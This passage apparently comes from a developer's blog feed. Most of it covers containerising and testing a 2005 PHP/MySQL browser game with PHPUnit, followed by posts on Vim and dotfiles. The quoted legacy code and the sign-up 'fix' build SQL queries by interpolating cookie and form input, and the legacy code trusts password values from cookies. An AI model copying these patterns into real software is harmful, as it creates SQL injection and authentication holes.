SignUpNewPlayer::run(
$username,
$password,
$passwordConfirmation
);
Assert::signedUpCount($username, 0);
}
}
If I've read the long and nested if statements correctly, this should cover all the different sign-up scenarios, including username and password checking.
For now let's just run the "happy scenario" test to make sure it fails:
make test arg='--testdox --filter test_it_allows_visitors_to_become_players'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
F 1 / 1 (100%)
Time: 00:00.032, Memory: 18.00 MB
Sign Up (Bl\Qa\Tests\EndToEnd\SignUp)
✘ It allows visitors to become players
┐
├ Failed asserting that Signed Up Count 0 is 1
│
│ /apps/qa/tests/EndToEnd/Assertion/Assert.php:114
│ /apps/qa/tests/EndToEnd/SignUpTest.php:30
┴
FAILURES!
Tests: 1, Assertions: 1, Failures: 1.
Brilliant! Before we fix it, I'll dive a bit more in the test details.
I was surprised to find out that the username BisouLand was forbidden,
turns out it is used to send system notifications
(though I note that the checks are case sensitive only).
This is actually what inspired me to use BisouTest as a special test username,
if you remember correctly in the SignUpNewPlayer scenario,
which we've reused from the Smoke Tests as we would have done the exact same logic,
we have the following:
if ('BisouTest' === $username) {
$username = substr('BisouTest_'.uniqid(), 0, 15);
}
This makes sure that there will be no username duplicates.
One thing I didn't mention in my previous article was that I've setup a way
to cleanup the test data with the DeleteAllTestPlayers scenario:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
final readonly class DeleteAllTestPlayers
{
public static function run(): void
{
$pdo = TestKernelSingleton::get()->pdo();
$pdo->query("DELETE FROM membres WHERE pseudo LIKE 'BisouTest%'");
}
}
This is called by a PHPUnit subscriber for the TestRunner\Finished event:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Subscriber;
use Bl\Qa\Tests\Infrastructure\Scenario\DeleteAllTestPlayers;
use PHPUnit\Event\TestRunner\Finished;
use PHPUnit\Event\TestRunner\FinishedSubscriber;
final readonly class TestCleanupSubscriber implements FinishedSubscriber
{
public function notify(Finished $event): void
{
DeleteAllTestPlayers::run();
}
}
This will be called once the testsuite is finished executing, but only if we register the subscriber in a PHPUnit Extension:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Subscriber;
use PHPUnit\Runner\Extension\Extension;
use PHPUnit\Runner\Extension\Facade;
use PHPUnit\Runner\Extension\ParameterCollection;
use PHPUnit\TextUI\Configuration\Configuration;
final readonly class TestCleanupExtension implements Extension
{
public function bootstrap(Configuration $configuration, Facade $facade, ParameterCollection $parameters): void
{
$facade->registerSubscriber(new TestCleanupSubscriber());
}
}
The extension also has to be registered in the phpunit.xml config:
<?xml version="1.0" encoding="UTF-8"?>
<!-- https://phpunit.readthedocs.io/en/latest/configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="vendor/phpunit/phpunit/phpunit.xsd"
bootstrap="vendor/autoload.php"
cacheDirectory=".phpunit.cache"
executionOrder="depends,defects"
shortenArraysForExportThreshold="10"
requireCoverageMetadata="true"
beStrictAboutCoverageMetadata="true"
beStrictAboutOutputDuringTests="true"
displayDetailsOnPhpunitDeprecations="true"
colors="true"
failOnPhpunitDeprecation="true"
failOnRisky="true"
failOnWarning="true">
<php>
<ini name="display_errors" value="1" />
<ini name="error_reporting" value="-1" />
<env name="APP_ENV" value="test" force="true" />
<env name="SHELL_VERBOSITY" value="-1" />
</php>
<testsuites>
<testsuite name="smoke">
<directory>tests/Smoke</directory>
</testsuite>
<testsuite name="end-to-end">
<directory>tests/EndToEnd</directory>
</testsuite>
</testsuites>
<extensions>
<bootstrap class="Bl\Qa\Tests\Infrastructure\Subscriber\TestCleanupExtension"/>
</extensions>
<source ignoreIndirectDeprecations="true" restrictNotices="true" restrictWarnings="true">
<include>
<directory>../monolith/web</directory>
</include>
</source>
</phpunit>
I've created a signedUpCount custom assertion,
which will count in the database the number of records persisted for a given
username:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\EndToEnd\Assertion;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use PHPUnit\Framework\Assert as PHPUnitAssert;
final readonly class Assert
{
public static function signedUpCount(string $username, int $expectedCount): void
{
$pdo = TestKernelSingleton::get()->pdo();
$stmt = $pdo->prepare('SELECT COUNT(*) FROM membres WHERE pseudo = :username');
$stmt->execute([
'username' => $username,
]);
$actualCount = (int) $stmt->fetchColumn();
PHPUnitAssert::assertSame(
$expectedCount,
$actualCount,
"Failed asserting that Signed Up Count {$actualCount} is {$expectedCount}",
);
}
}
I think there's an argument to have had made two assertions
(eg signedUpSuccessful count = 1, and signedUpFailed count = 0),
but for now I'm happy with this.
We're going to fix that bug by removing the ID field from the query:
mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
." VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
Let's see if the bug is fixed by running the one test:
make test arg='--testdox --filter test_it_allows_visitors_to_become_players'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
. 1 / 1 (100%)
Time: 00:00.018, Memory: 18.00 MB
Sign Up (Bl\Qa\Tests\EndToEnd\SignUp)
✔ It allows visitors to become players
OK (1 test, 1 assertion)
So far so good, let's confirm by running all the tests:
make test
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
................................................. 49 / 49 (100%)
Time: 00:00.162, Memory: 18.00 MB
OK (49 tests, 49 assertions)
Excellent! All fixed!
I believe there will be many more instances of this, and given the success of this fix we can assume it's safe to apply to all instances.
But I know these mysql_query calls will be removed very soon:
The End to End tests we've written also allow us to refactor the code, instead of a nested list we can for example make use of early returns.
But if I have to refactor that code, I want to do it right, by first writing unit tests which will make a design model emerge, and by creating an API so we can also have integration tests.
Once we have these, both the Smoke Tests and End to End tests can be removed.
So I'm going to leave this as is for now.
]]>⁉️ What do you mean, "the code is ugly"??
🤘 The Quality Avenger emerges from the burning forges of Coding Standards, smelting the ores of Static Analysis into the moulds of Automated Testing. 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can access it (http://localhost:8080/) and manually check it. Unfortunately looking at the code, it's obvious we cannot launch it to production as is:
But how do we know we're not breaking anything when fixing these? As things currently stand, we don't even know what features BisouLand has.
So, we're going to need to write tests, which will be today's second article focus.
The first plan of action is to move the current app into the ./apps/monolith
sub-folder, and to create a new QA one in ./apps/qa.
This approach will allow us to isolate the legacy code from any tooling we might need to bring it up to standards.
The QA application has the following tree directory:
apps/qa/
├── composer.json
├── composer.lock
├── compose.yaml
├── Dockerfile
├── Makefile
├── phpstan-baseline.neon
├── phpstan.neon.dist
├── phpunit.xml.dist
├── README.md
└── tests/
As you can see, it has its own Dockerfile:
# syntax=docker/dockerfile:1
###
# PHP Dev Container
# Utility Tools: PHP, bash, Composer
###
FROM php:8.4-cli-alpine AS php_dev_container
# Composer environment variables:
# * default user is superuser (root), so allow them
# * put cache directory in a readable/writable location
# _Note_: When running `composer` in container, use `--no-cache` option
ENV COMPOSER_ALLOW_SUPERUSER=1 \
COMPOSER_CACHE_DIR=/tmp/.composer/cache
# Install dependencies:
# * bash for shell access and scripting
# * zip for composer packages that use ZIP archives
# _Note (Alpine)_: `--no-cache` includes `--update` and keeps image size minimal
#
# Then install PHP extensions
#
# _Note (Hadolint)_: No version locking, since Alpine only ever provides one version
# hadolint ignore=DL3018
RUN apk add --update --no-cache \
bash \
libzip-dev \
zip \
&& docker-php-ext-install \
bcmath \
pdo \
pdo_mysql \
zip
# Copy Composer binary from composer image
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
WORKDIR /apps/qa
# Caching `composer install`, as long as composer.{json,lock} don't change.
COPY composer.json composer.lock ./
RUN composer install \
--no-cache \
--no-interaction \
--no-plugins \
--no-scripts \
--optimize-autoloader
# Copy the remaining application files (excluding those listed in .dockerignore)
COPY . .
And compose.yaml:
name: skyswoon-qa
services:
app:
build: .
command: php -S 0.0.0.0:8081
volumes:
# Mount current directory into container for QA tools and configs
- .:/apps/qa
# Mount the monolith source code for analysis
- ../monolith:/apps/monolith
networks:
- default
- skyswoon-monolith_default
networks:
skyswoon-monolith_default:
external: true
This allows us to have QA in its own container (with PHP 8.4), but it can still communicate with the monolith container, so we can issue curl requets or query the MySQL database.
It also allows access to the monolith source files, so we can run toolings on them like phpstan, rector, PHP CS Fixer, etc.
There are two kinds of tests that I hate (this is coming from a Test Driven Development practitioner, btw!) and one of them is Smoke Tests.
Those basically issue a curl request,
and only check the bare minimum such as the status code is 200.
I don't like these because they are slow (remote requests),
unreliable (errors like form validation, page not found, etc will still return 200),
and overall don't provide much value at all.
However in this specific case I still think Smoke Tests can help us, notably to make a list of what pages the website has, and also differentiate the ones that are public, and the ones that should only be accessed by logged in players.
This will be valuable knowledge, and once we have better test coverage we can get rid of those.
After manually navigating the website, checking the pages.php file,
and overall getting familiar with the app,
I've documented my findings in a data provider in the following Smoke Test,
which checks if all private pages are accessible to logged in players,
but not for logged out visitors:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Smoke;
use Bl\Qa\Tests\Infrastructure\Scenario\GetLoggedInPlayer;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use Bl\Qa\Tests\Smoke\Assertion\Assert;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\Attributes\Large;
use PHPUnit\Framework\Attributes\TestDox;
use PHPUnit\Framework\TestCase;
#[CoversNothing]
#[Large]
final class PlayerPagesTest extends TestCase
{
#[TestDox('it blocks $pageName page (`$url`) for visitors')]
#[DataProvider('playerPagesProvider')]
public function test_it_blocks_player_page_for_visitors(string $url, string $pageName): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$response = $httpClient->request('GET', $url);
Assert::blocksPageForLoggedOutVisitors($response);
}
#[TestDox('it loads $pageName page (`$url`) for logged in players')]
#[DataProvider('playerPagesProvider')]
public function test_it_loads_player_page_for_logged_in_players(string $url, string $pageName): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$loggedInPlayer = GetLoggedInPlayer::run();
$response = $httpClient->request('GET', $url, [
'headers' => [
'Cookie' => $loggedInPlayer->sessionCookie,
],
]);
Assert::loadsPageForLoggedInPlayers($response);
}
/**
* @return array<array{string, string}>
*/
public static function playerPagesProvider(): array
{
return [
['/connected.html', 'account'],
['/action.html', 'blow kisses'],
['/cerveau.html', 'brain'],
['/changepass.html', 'change password'],
['/nuage.html', 'clouds'],
['/yeux.html', 'eyes'],
['/boite.html', 'inbox'],
['/bisous.html', 'kisses'],
['/construction.html', 'organs'],
['/infos.html', 'reference'],
['/techno.html', 'techniques'],
['/lire.html', 'view message'],
];
}
}
Running this test should output the following:
> make test arg='--testdox --filter PlayerPages'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.11
Configuration: /apps/qa/phpunit.xml.dist
........................ 24 / 24 (100%)
Time: 00:00.606, Memory: 18.00 MB
Player Pages (Bl\Qa\Tests\Smoke\PlayerPages)
✔ it blocks organs page (`/construction.html`) for visitors
✔ it blocks account page (`/connected.html`) for visitors
✔ it blocks reference page (`/infos.html`) for visitors
✔ it blocks kisses page (`/bisous.html`) for visitors
✔ it blocks brain page (`/cerveau.html`) for visitors
✔ it blocks change·password page (`/changepass.html`) for visitors
✔ it blocks eyes page (`/yeux.html`) for visitors
✔ it blocks view·message page (`/lire.html`) for visitors
✔ it blocks clouds page (`/nuage.html`) for visitors
✔ it blocks inbox page (`/boite.html`) for visitors
✔ it blocks techniques page (`/techno.html`) for visitors
✔ it blocks blow·kisses page (`/action.html`) for visitors
✔ it loads view·message page (`/lire.html`) for logged in players
✔ it loads eyes page (`/yeux.html`) for logged in players
✔ it loads brain page (`/cerveau.html`) for logged in players
✔ it loads change·password page (`/changepass.html`) for logged in players
✔ it loads techniques page (`/techno.html`) for logged in players
✔ it loads account page (`/connected.html`) for logged in players
✔ it loads reference page (`/infos.html`) for logged in players
✔ it loads inbox page (`/boite.html`) for logged in players
✔ it loads kisses page (`/bisous.html`) for logged in players
✔ it loads organs page (`/construction.html`) for logged in players
✔ it loads clouds page (`/nuage.html`) for logged in players
✔ it loads blow·kisses page (`/action.html`) for logged in players
OK (24 tests, 24 assertions)
🔗 Check: PHPUnit Best Practices
The test is structured as follow:
SignUpNewPlayer, LogInPlayer, etcTo be able to see if a page is blocked for a non logged in visitor, we cannot just rely on the HTTP Status (it will always be 200), so we have to instead check for error messages contained in the page.
Through my search, I've discovered that various messages get displayed when a logged out visitor tries to access a private page, I've documented this in the following custom assertion:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Smoke\Assertion;
use PHPUnit\Framework\Assert as PHPUnitAssert;
use Symfony\Contracts\HttpClient\ResponseInterface;
final readonly class Assert
{
private const array NOT_LOGGED_IN_MESSAGES = [
// Warning: side bar contains `Tu n'es pas connecté.`
'standard' => 'es pas connecté !!',
'variant 1 (inbox)' => 'es pas connecté !!',
'variant 2 (kisses, organs, techniques, account)' => 'Veuillez vous connecter.',
'variant 3 (reference)' => 'Erreur... et vouaip !! :D',
];
public static function blocksPageForLoggedOutVisitors(ResponseInterface $response): void
{
$content = (string) $response->getContent();
foreach (self::NOT_LOGGED_IN_MESSAGES as $message) {
if (str_contains($content, $message)) {
PHPUnitAssert::assertSame(200, $response->getStatusCode(), $content);
return;
}
}
PHPUnitAssert::fail('Failed asserting that Page is blocked for logged out visitors');
}
public static function loadsPageForLoggedInPlayers(ResponseInterface $response): void
{
$content = (string) $response->getContent();
foreach (self::NOT_LOGGED_IN_MESSAGES as $message) {
if (str_contains($content, $message)) {
PHPUnitAssert::fail('Failed asserting that Page loads for logged in players');
}
}
PHPUnitAssert::assertSame(200, $response->getStatusCode(), $content);
}
}
For some of our tests, we need to have a visitor to first sign up as a player, which I've done through the following "Scenario" class:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
final readonly class SignUpNewPlayer
{
public static function run(
string $username = 'BisouTest',
string $password = 'password',
string $passwordConfirmation = 'password',
): Player {
$httpClient = TestKernelSingleton::get()->httpClient();
if ('BisouTest' === $username) {
$username = substr('BisouTest_'.uniqid(), 0, 15);
}
$httpClient->request('POST', '/inscription.html', [
'body' => [
'Ipseudo' => $username,
'Imdp' => $password,
'Imdp2' => $passwordConfirmation,
'inscription' => "S'inscrire",
],
'headers' => [
'Content-Type' => 'application/x-www-form-urlencoded',
],
]);
return new Player($username, $password);
}
}
Here we do an HTTP request that will simulate posting the HTML form, alternatives for this would have been doing a SQL query to directly create the player in the database, but we risk missing other insertions that might be required.
The advantage of the current approach is that it also smoke tests the signup form.
We also need the player to be logged in:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use Symfony\Component\HttpClient\Exception\RedirectionException;
final readonly class LogInPlayer
{
public static function run(Player $player): string
{
$httpClient = TestKernelSingleton::get()->httpClient();
try {
$response = $httpClient->request('POST', '/redirect.php', [
'body' => [
'pseudo' => $player->username,
'mdp' => $player->password,
'connexion' => 'Se connecter',
],
'headers' => [
'Content-Type' => 'application/x-www-form-urlencoded',
],
'max_redirects' => 0,
]);
} catch (RedirectionException $e) { // @phpstan-ignore catch.neverThrown
// With max_redirects=0, HttpClient throws an exception when we get a 302
// This is expected on successful login
$response = $e->getResponse();
}
$headers = $response->getHeaders(false);
$cookies = $headers['set-cookie'] ?? $headers['Set-Cookie'] ?? [];
foreach ($cookies as $cookie) {
if (str_starts_with($cookie, 'PHPSESSID=')) {
return $cookie;
}
}
$content = $response->getContent(false);
$allCookies = implode(', ', $cookies);
throw new \RuntimeException("Login failed: PHPSESSID cookie not found. Cookies: [{$allCookies}], Content: {$content}");
}
}
Similarly to the SignUpNewPlayer scenario,
LogInPlayer posts a HTTP request that simulates the log in form.
To be abe to then act as the logged in player, we need their Session Cookie string, so we make sure to return it.
Finally the GetLoggedInPlayer scenario will sign up and login a player once,
and always return it to save us some overhead in the test suite:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
final class GetLoggedInPlayer
{
private static ?LoggedInPlayer $loggedInPlayer = null;
public static function run(): LoggedInPlayer
{
if (null === self::$loggedInPlayer) {
$player = SignUpNewPlayer::run();
$sessionCookie = LogInPlayer::run($player);
self::$loggedInPlayer = new LoggedInPlayer($player->username, $player->password, $sessionCookie);
}
return self::$loggedInPlayer;
}
}
These scenarios will come in handy when we start writing other kinds of tests.
💻 Source code:
Now we can type:
make test arg='--testdox --filter PlayerPages'
And get the list of all public and private pages.
]]>⁉️ What do you mean, "tests are failing"??
🤘 From the abyssal depths of forgotten servers, Docker the Void-Walker awakens to drag ancient LAMP stack from their tombs, wrapping them in the obsidian chains of containerization! 🔥
Back in 2005, I learned how to write Linux/Apache/MySQL/PHP websites thanks to the Site du Zero (SdZ), which is now known as Open Classrooms.
I also used to play a web-browser game, similar to OGame, called BisouLand (SkySwoon). Turns out its creator also built it through SdZ tutorials!
Fast forward 20 years later (today), I received a message on LinkedIn from a CTO asking me the following:
💬 "Are you willing to work with eXtreme Legacy code on occasion?"
I wondered to myself: what is eXtreme Legacy code? And I immediately remembered BisouLand.
You see, back in 2011, its creator had made it Open Source on github and made me code collaborator...
So I do have access to a 2005 LAMP stack website, cobbled together by someone learning stuff on the go from the internet.
What would it take, in 2025, to get an eXtreme Legacy app up and running?
This is what we're going to find out in this series.
Today's first article is about getting it to run, at least locally.
The version 1 has the following tree directory:
web/
├── .htaccess
├── checkConnect.php
├── deconnexion.php
├── favicon.ico
├── images/
├── includes/
│ ├── bisouStyle2.css
│ ├── compteur.js
│ ├── newbisouStyle2.css
│ └── prev.js
├── index.php
├── phpincludes/
│ ├── accueil.php
│ ├── action.php
│ ├── aide.php
│ ├── attaque.php
│ ├── bd.php
│ ├── bisous.php
│ ├── confirmation.php
│ ├── connected.php
│ ├── connexion.php
│ ├── erreur404.php
│ ├── evo.php
│ ├── fctIndex.php
│ ├── nuage.php
│ ├── ...
│ ├── pages.php
│ └── yeux.php
└── redirect.php
The .htaccess file contains URL rewrite rules for Apache:
RewriteEngine on
RewriteRule (.+)\.confirmation\.html$ /index.php?page=confirmation&id=$1
RewriteRule (.+)\.bisous\.html$ /index.php?page=bisous&cancel=$1
RewriteRule (.+)\.(.+)\.nuage\.html$ /index.php?page=nuage&saut=1&sautnuage=$1&sautposition=$2
RewriteRule (.+)\.nuage\.html$ /index.php?page=nuage&nuage=$1
RewriteRule (.+)\.(.+)\.action\.html$ /index.php?page=action&nuage=$1&position=$2
RewriteRule (.+)\.(.+)\.yeux\.html$ /index.php?page=yeux&Dnuage=$1&Dpos=$2
RewriteRule (.+)\.html$ /index.php?page=$1
ErrorDocument 404 /erreur404.html
There are no Database schema, but a quick scan at the files will reveal the use
of MySQL, for example web/phpincludes/bd.php:
<?php
function bd_connect() {
mysql_pconnect("HOST", "USER", "PASSWORD");
mysql_select_db("DATABASE");
}
As for the code architecture, the file web/index.php acts as a
front controller that displays the layout of the website, and then includes
a file from web/phpincludes/ for the actual page content.
The HTML is mixed with the MySQL queries, session managemenet, game logic and any other PHP code. Code and comments are written in French, and there are several encoding issues.
Here's an extract from web/index.php:
<?php
header('Content-type: text/html; charset=ISO-8859-1');
session_start();
ob_start();
include 'phpincludes/bd.php';
bd_connect();
include('phpincludes/fctIndex.php');
//Si la variable $_SESSION['logged'] n'existe pas, on la créée, et on l'initialise a false
if (!isset($_SESSION['logged'])) $_SESSION['logged'] = false;
//Si on est pas connecté.
if ($_SESSION['logged'] == false)
{
$id=0;
//On récupère les cookies enregistrés chez l'utilisateurs, s'ils sont la.
if (isset($_COOKIE['pseudo']) && isset($_COOKIE['mdp']))
{
$pseudo = htmlentities(addslashes($_COOKIE['pseudo']));
$mdp = htmlentities(addslashes($_COOKIE['mdp']));
//La requête qui compte le nombre de pseudos
$sql = mysql_query("SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo='".$pseudo."'");
if (mysql_result($sql,0,'nb_pseudo') != 0)
{
//Sélection des informations.
$sql_info = mysql_query("SELECT id, confirmation, mdp, nuage FROM membres WHERE pseudo='".$pseudo."'");
$donnees_info = mysql_fetch_assoc($sql_info);
//Si le mot de passe est le même (le mot de passe est déjà crypté).
if ($donnees_info['mdp'] == $mdp)
{
//Si le compte est confirmé.
if ($donnees_info['confirmation'] == 1)
{
//On modifie la variable qui nous indique que le membre est connecté.
$_SESSION['logged'] = true;
$page='cerveau';
}
}
}
}
}
if ($_SESSION['logged'] == true)
{
//l'id du membre.
$id=$_SESSION['id'];
//Fonction destinée à l'administration
if (isset($_POST['UnAct']) && $id==12)
{
actionAdmin();
}
$sql_info = mysql_query(
"SELECT timestamp, coeur, bouche, amour, jambes, smack, baiser, pelle, tech1, tech2, tech3, tech4, dent, langue, bloque, soupe, oeil"
." FROM membres WHERE id='".$id."'"
);
$donnees_info = mysql_fetch_assoc($sql_info);
//On récupère le nombre de points d'amour.
$amour = $donnees_info['amour'];
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" media="screen" type="text/css" title="bisouStyle2" href="includes/bisouStyle2.css" />
<link rel="shorcut icon" href="http://bisouland.piwai.info/favicon.ico"/>
<meta http-equiv="Content-Language" content="fr" />
</head>
<body>
<div id="speedbarre">
<?php if ($_SESSION['logged'] == true)
{?>
<?php echo formaterNombre(floor($amour)); ?>
<?php
}
else
{
?>
<a href="connexion.html">Connexion</a>
<?php } ?>
</div>
<div id="corps">
<?php
include('phpincludes/pages.php');
if (isset($array_pages[$page]))
{
include('phpincludes/'.$array_pages[$page]);
}
else
{
include('phpincludes/erreur404.php');
}
?>
</div>
</body>
</html>
😵
In addition to the spaghetti code, we can immediately spot security issues. But we cannot fix anything until we can manually test the website, so how do we get it to run?
Back in 2005, the most common versions of the LAMP stack were:
Applications written for MySQL 4.0 and PHP 4.3 can be run up to MySQL 5.7 and PHP 5.6. Some deprecation notices would be issued, but in terms of backward compatibility that's how far we can stretch things.
So let's create a Dockerfile that will have Apache 2, PHP 5.6 and MySQL 5.7:
# syntax=docker/dockerfile:1
FROM php:5.6-apache
# Update sources.list to use archive repositories for Debian Stretch
RUN sed -i 's/deb.debian.org/archive.debian.org/g' /etc/apt/sources.list \
&& sed -i 's/security.debian.org/archive.debian.org/g' /etc/apt/sources.list \
&& sed -i '/stretch-updates/d' /etc/apt/sources.list
# Install system dependencies and PHP extensions in single layer
RUN docker-php-ext-install mysql \
&& a2enmod rewrite
# Set working directory
WORKDIR /var/www/html
# Copy application files with proper ownership
COPY --chown=www-data:www-data web/ /var/www/html/
With the following compose.yaml, we'll set up the Apache and MySQL servers:
name: skyswoon-monolith
services:
web:
build: .
ports:
- "8080:80"
volumes:
- ./web:/var/www/html
depends_on:
- db
environment:
DATABASE_HOST: ${DATABASE_HOST}
DATABASE_USER: ${DATABASE_USER}
DATABASE_PASSWORD: ${DATABASE_PASSWORD}
DATABASE_NAME: ${DATABASE_NAME}
restart: unless-stopped
db:
image: mysql:5.7
platform: linux/amd64
environment:
MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD}
MYSQL_DATABASE: ${DATABASE_NAME}
MYSQL_USER: ${DATABASE_USER}
MYSQL_PASSWORD: ${DATABASE_PASSWORD}
volumes:
- mysql_data:/var/lib/mysql
ports:
- "127.0.0.1:3306:3306"
restart: unless-stopped
volumes:
mysql_data:
You might notice that I've mentioned some environment variables,
to configure the database. These will need to be set in a .env file:
# Database
DATABASE_HOST=db
DATABASE_USER=database_user
DATABASE_PASSWORD=database_password
DATABASE_NAME=database_name
# MySQL root password (for Docker)
MYSQL_ROOT_PASSWORD=mysql_root_password
When the docker compose up is run,
Docker Composer automatically reads from .env and sets the environment variable,
then PHP will copy these into the $_ENV array super global,
so we can get the values like so in web/phpincludes/bd.php:
<?php
function bd_connect()
{
mysql_pconnect(
$_ENV['DATABASE_HOST'],
$_ENV['DATABASE_USER'],
$_ENV['DATABASE_PASSWORD'],
);
mysql_select_db($_ENV['DATABASE_NAME']);
}
Last but not least, I'm adding a Makefile, to avoid having to type long
docker compose build; docker compose up commands: see file in github.
Super Secret Tip: I've written about My Symfony Dockerfile, and My Symfony Makefile.
💻 Source code:

And we did it! now by typing:
make build; make up
We get BisouLand running live, 20 years after its conception.
You can visit it there: http://localhost:8080/accueil.html.
]]>⁉️ What do you mean, "it doesn't work"?? It works on my machine!
The keyboards leak molten steel, as Vim motions carve runes through silicon, the code prostrates itself before the LSP's omniscient eye:
phpactor descends as the shape-shifting overlord who bends variables and transmutes classes into monuments of perfect refactors.
XDebug breakpoints become lightning-riders galloping through Vim buffers.
In this article, I'll discuss why Vim is my favourite IDE (not test/code editor, no, fully fledged IDE).
I started my programming journey in 2004 on Smultron, since I was told the go-to app was Notepad++, but my parents had a mac.
When I migrated to Ubuntu in 2006, I simply switched to Gedit. I remember learning vi at the time, just to be able to do things while ssh-ing onto remote servers.
It was at University, in 2008, that I started to use a proper IDE: Emacs, which was mandatory for all students. I didn't mind though as I was happy to level up my geekiness, and by that time I was developing a strong preference for the terminal.
But during my multiple internships and apprenticeships, I was told that professionals used proper IDEs, and was made to use Eclipse and NetBeans.
I have to say I was never impressed with the lack of responsiveness from these tools.
When I started to work at SensioLabs in 2013, frustrated with how slow these IDEs were, I switched to Sublime Text.
When I moved to the UK in 2014 and started to work for the startup Constant.Co, I continued to use Sublime Text, to my colleague's amusement.
In 2015, Adam, who'd become our VP of Engineering, joined and we had a lot of extremely interesting conversations. One of the many things he told me, which stuck with me, regarding Text / Code Editors versus IDEs was:
It's not the tool that matters, it's how well you learn, understand and use it.
This is when I decided to drop Sublime Text. And use Vim instead.
Before I talk more about Vim, I want to mention that after joining Telum Media in 2024, I was made to use PhpStorm as it was mandatory. Same policy when I joined Bumble in 2025.
In terms of preference, the terminal has always taken precedence over the Graphical User Interface for me, and I tend to favour using the keyboard (and shortcuts) over the mouse and gestures.
In retrospect, I think there's also a lot of noise that comes with the default interface of Eclipse, NetBeans and PhpStorm, which I personally find distracting.
So I considered the two options in front of me: Emacs or Vim? After finding out that Vim motions were supported in other IDEs, I made my choice.
Why don't you use a proper IDE?
This is a question I often get when I mention I use Vim.
A "proper" IDE provides:
By integrating Vim with LSP we get all the features listed above.
Another important feature of IDEs is:
As it turns out, it's also possible to integrate Vim with those (eg xdebug).
Other integration, that some might add to the list of important things, are:
These are also possible, but personally I much prefer to use directly the tools for these from the terminal.
So. Can anyone let me know what I'm missing out from Vim, that I'd be getting from "proper" IDEs?
Perhaps the biggest argument in favour of Vim would be the Motions:
h, j, k, l: move one character Left, Down, Up, Right (LDUR)0, ^, $: move to the first character of the line, first non whitespace character, last characterf{char}, t{char}: move to next occurrence of character in the line, on the character or before itThey can be Composed with operators:
d: deletingy: yank, aka copyingp: pastec: changeFor more Precision, Text Objects can be used:
w: a words: a sentencep: a paragraphHere are a couple of examples:
dt;: delete, until, character ;: to cut everything before the semi colonci': change, inside, simple quotes: to replace text inside single quotes
(works with double quote, parenthesis, curly braces, etc)Making one's changes repeatable will unleash even more power:
d23d: delete 23 lines.: replay previous actionqa: register keystrokes in register a@a: replay keystrokes from register aWhile there is a lot to learn, I'd say the Vim motions aren't too difficult to memorize since they are mnemonic as much as possible.
They also have some logic in terms of direction: lowercase is forward
(yf: copy from cursor to next space, space included) and uppercase is backward
(yF: copy from cursor to previous space, space included).
But I can attest that there's a lot to learn, and it's easy to plateau. I've personally stuck with a small subset of these for a decade, and have only decided this year (2025) to learn more (macros are AMAZING).
When I was mandated to use PhpStorm at Telum Media in 2024, I decided to give it a fair chance and use it exactly as intended. But I wasn't convinced I gained any efficiency compared to Vim.
When the same requirement came up at Bumble in 2025, I took a different approach: minimalistic UI, Vim motions enabled (though support isn't perfect: I experienced issues with macros, for example).
This compromise will likely be my path forward: use Vim when possible, and configure whatever I'm required to use to feel as Vim-like as possible.
The broader lesson? Unless there's a compelling reason, forcing developers away from tools they've mastered is counterproductive.
Listen to Adam's wise advice: Deep knowledge of one's workflow, getting proficient with one's tool and seeking improvement matters more than whatever software happen to be the most popular.
]]>My dotfiles repository is how I backup, restore and synchronise my shell / system preferences and settings.
I felt the need to do so back in 2014, when I had 3 computers (personal desktop, personal laptop and work laptop) and wanted to keep the same config across the different devices.
I now have one single device, yet this has proven very useful over the years, especially any time I upgraded to a new device.
A decade ago, I tried my best to come up with a system that would:
I'm happy to report I was successful in this, and I was even able to add cross platform compability (macOS) in 2025.
The configuration files for most UNIX tools usually start with a dot (.),
hence the name "dot files".
Examples of such files are:
.bashrc, configuring the bash shell.vimrc, setting up the powerful IDE.gitconfig, instructing git about your personal preferencesIt's only this year that I started researching solutions on how to manage dotfiles, in order to add support for macOS. There are so many tools:
I got really interested in Ansible, which promised to set up my computers in an automated way.
But then I realise the size of the configuration files were way longer than if I did it in a simple bash script. I also didn't like the idea to have to learn, and maintain knowledge of yet another tool.
So in the end I decided to stick with what I had set up. And cross platform compatibility turned out to be a breeze to implement!
My dotfile repository follows this file tree structure:
.
├── <xy>-<package>/
│ ├── _<package-manager>.sh
